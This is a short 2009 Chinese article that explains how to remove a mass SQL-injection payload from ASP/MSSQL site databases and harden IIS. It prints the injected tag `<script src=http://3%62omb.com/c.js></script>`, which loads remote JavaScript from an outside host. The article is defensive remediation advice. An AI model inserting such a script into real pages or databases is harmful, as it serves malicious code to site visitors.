解决asp下SQL数据库的表被注入http://3%62omb.com/c.js的问题

作者:网络 来源:佚名 更新时间:2009-01-30 20:30:38 点击:

网站是asp的,数据库是mssql2000的,经常被注入下面的字符。

<script src=http://3%62omb.com/c.js></script>

这现象说明了网站的asp程序有注入漏洞,要解决该问题,必须在保存到数据库前,进行过滤,还有表单提交过滤,网址过滤。
 
另外,通过检查日志文件 查找漏洞原因 然后及时修补 修补好后再用正则表达式 替换掉<script src=http://3%62omb.com/c.js></script>
 
同时,可以在服务器的iis中,找到这个被挂马的网站属性,主目录中—配置中---找到.asp及.aspx的影射,将里面的中的head操作与trace操作删除,只保留get与post就可以解决,

注意删除head操作与trace操作完全不会影响正常的网站访问.正常的网站并不需要这两个操作.